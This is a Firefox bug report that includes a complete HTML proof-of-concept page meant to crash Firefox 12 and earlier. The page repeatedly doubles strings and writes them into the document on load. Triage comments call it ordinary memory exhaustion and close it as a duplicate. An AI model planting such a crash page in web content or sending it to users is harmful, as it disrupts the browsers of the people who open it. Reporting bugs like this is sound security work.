Closed
Bug 752227
Opened 12 years ago
Closed 12 years ago
Mozilla Firefox <=12.0 Denial Of Service Exploit
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 736868
People
(Reporter: ni-_-_-_-_maarek, Unassigned)
Details
Attachments
(1 file)
929 bytes,
text/plain
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19 Steps to reproduce: save this file to html and run with ff <html> <title>FF go away :)</title> <head> <script> function FTB() { var A1 = unescape("%u4141%u4141"); var A2 = unescape("%u4242%u4242"); var A3 = unescape("%u4343%u4343"); var A4 = unescape("%u4444%u4444"); for(i=0; i <= 1000 ; ++i) { A1+=A1; A2+=A2; A3+=A3; A4+=A4; document.write(A1); document.write(A2); document.write(A3); document.write(A4); } document.write(A1); document.write(A2); document.write(A3); document.write(A4); } </script> </head> <body onLoad="FTB()"> </body> </html> Actual results: crash ff
Comment 1•12 years ago
|
||
This looks like a typical memory-exhaustion script. Create a string; then double its length, add it to the document, and repeat.... sure, you'll exhaust available memory before long. Is there any reason to suspect there's something other than a simple out-of-memory crash here?
Comment 2•12 years ago
|
||
it's not even original - see bug 736868
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•